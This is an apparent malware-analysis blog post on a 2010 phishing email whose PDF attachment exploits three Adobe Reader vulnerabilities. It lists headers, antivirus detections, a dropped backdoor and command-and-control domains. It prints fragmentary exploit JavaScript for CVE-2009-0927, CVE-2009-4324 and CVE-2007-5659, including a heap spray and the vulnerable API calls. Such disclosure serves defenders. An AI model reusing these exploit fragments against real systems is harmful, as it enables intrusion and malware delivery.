Tuesday, August 3, 2010

Aug 3 CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659 Please confirm from 94255015@nccu.edu.tw 140.119.166.13



Download 350924123cbf1b126f4e38335ed6660d + files dropped as a password protected archive (contact me if you need the password)





-----Original Message-----
From: 94255015 [mailto:94255015@nccu.edu.tw]
Sent: Tuesday, August 03, 2010 11:24 AM
To: xxxxxxxxx
Subject: Please confirm~


Dear xxxxxxxxxxxxxxxx:

I'm very sorry to bother you,but please to make sure you have attended the meetings,and to confirm the agenda is correct.Thank you very much!

Your sincerely,
Aaron

 Headers
Received: (qmail 6491 invoked from network); 3 Aug 2010 15:08:01 -0000
Received: from alumni2.nccu.edu.tw (HELO alumni2.nccu.edu.tw) (140.119.166.13)
  by xxxxxxxxxxxx
Received: By OpenMail Mailer;Tue, 03 Aug 2010 23:24:24 +0800 (CST)
From: "94255015" <94255015@nccu.edu.tw>
Reply-To: 94255015@nccu.edu.tw
Subject: Please confirm~
Message-ID: <1280849064.24992.94255015@nccu.edu.tw>
To: "xxxxxxxxx
Date: Tue, 3 Aug 2010 23:24:24 +0800
MIME-Version: 1.0
Return-Path: 94255015@nccu.edu.tw
Content-Type: multipart/mixed; boundary="---=Z8PIZ9?YwlMVFpoZJ2WvJ=sMbD"
 
140.119.166.13
 Hostname:    alumni2.nccu.edu.tw
ISP:    MOEC
Organization:    National Chengchi University
Proxy:    None detected
Type:    Broadband
Country:    Taiwan


File name:conference_program.pdf
http://www.virustotal.com/file-scan/report.html?id=220a1b24e02c2757eccebb6827b4021d570b0f662dd1b0772c22c96b8f6b7c1d-1282772703
Submission date:
2010-08-25 21:45:03 (UTC)
Current status:
17 /42 (40.5%)
Authentium     5.2.0.5     2010.08.25     PDF/Obfusc.G!Camelot
Avast     4.8.1351.0     2010.08.25     JS:Pdfka-gen
Avast5     5.0.594.0     2010.08.25     JS:Pdfka-gen
BitDefender     7.2     2010.08.25     Exploit.PDF-JS.Gen
ClamAV     0.96.2.0-git     2010.08.25     Heuristics.PDF.ObfuscatedNameObject
DrWeb     5.0.2.03300     2010.08.25     Exploit.PDF.1302
Emsisoft     5.0.0.37     2010.08.25     HTML.Malicious!IK
eSafe     7.0.17.0     2010.08.25     PDF.Exploit.4
F-Prot     4.6.1.107     2010.08.25     JS/ShellCode.S
F-Secure     9.0.15370.0     2010.08.25     Exploit.PDF-JS.Gen
GData     21     2010.08.25     Exploit.PDF-JS.Gen
Ikarus     T3.1.1.88.0     2010.08.25     HTML.Malicious
Kaspersky     7.0.0.125     2010.08.25     Exploit.JS.Pdfka.cri
nProtect     2010-08-25.02     2010.08.25     Exploit.PDF-Name.Gen
VBA32     3.12.14.0     2010.08.25     Exploit.JS.Pdfka.cri
Additional information
Show all
MD5   : 350924123cbf1b126f4e38335ed6660d


CVE-2009-0927 + CVE-2009-4324 + CVE-2007-5659

____________________________________
CVE-2009-0927

for (i = 0; i < buffersize; i ++ ){
buffer[i] = unescape("%0a%0a%0a%0a");
}
var strtmp3 = "Collab.get" + "Icon(buffer+'_N.bundle');";
eval(strtmp3);
---------------------------------------------------------
CVE-2009-4324

for (i = 0; i < 200; i ++ )memory[i] = block + shellcode;
try {
this .media.newPlayer(null);
}
catch (e){
}
util.printd(String.fromCharCode(2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570,
2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570
, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570, 2570), new Date());
}
----------------------------------------------------------------------
CVE-2007-5659

if (app.viewerVersion >= 6.0){
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : plin

Wepawet
http://wepawet.iseclab.org/view.php?hash=350924123cbf1b126f4e38335ed6660d&type=js 

 ---------------------

Windows XP SP2 Adobe Reader 9.11

Created files
%userprofile%\Application Data\diskchk.exe  379E0B3E2C4778075511C4C1E62C0C65
%userprofile%\Local Settings\Temp\2.tmp 
C:\a.pdf 

a.pdf

File name:
diskchk.exe
http://www.virustotal.com/file-scan/report.html?id=5ab0bc8ef4f276e2b8a8fa989aa8e35947f1f1a2694f786ab02d4d4b7eeab2d6-1282823469
Submission date:
2010-08-26 11:51:09 (UTC)
Result:
10/ 40 (25.0%)
AntiVir    8.2.4.46    2010.08.26    TR/Crypt.ZPACK.Gen
Avast    4.8.1351.0    2010.08.26    Win32:Malware-gen
Avast5    5.0.594.0    2010.08.26    Win32:Malware-gen
AVG    9.0.0.851    2010.08.26    BackDoor.Generic12.BUOQ
BitDefender    7.2    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
CAT-QuickHeal    11.00    2010.08.24    (Suspicious) - DNAScan
F-Secure    9.0.15370.0    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
GData    21    2010.08.26    Gen:Trojan.Heur.RP.bu0@a86LzSfb
nProtect    2010-08-26.01    2010.08.26    Trojan/W32.Agent.28160.MA
Sophos    4.56.0    2010.08.26    Troj/FkIntel-A
Additional information
Show all
MD5   : 379e0b3e2c4778075511c4c1e62c0c65


Anubis report
http://anubis.iseclab.org/?action=result&task_id=1f9a7a78ebc252b74a1362b81134726d7




DNS 
audnted.flinkup.org 220.246.73.187
facecache.mypicture.info 220.246.73.187
microinfo.3utilities.com 255.255.255.255

220.246.73.187
http://www.robtex.com/ip/220.246.73.187.html#whois
Hostname:    187.73.246.220.static.netvigator.com
ISP:    PCCW Limited
Organization:    PCCW Limited
Type:    Broadband
Assignment:    Dynamic IP
Country:    Hong Kong
City:    Kings Park
http://www.robtex.com/dns/187.73.246.220.static.netvigator.com.html#graph



No comments:

Post a Comment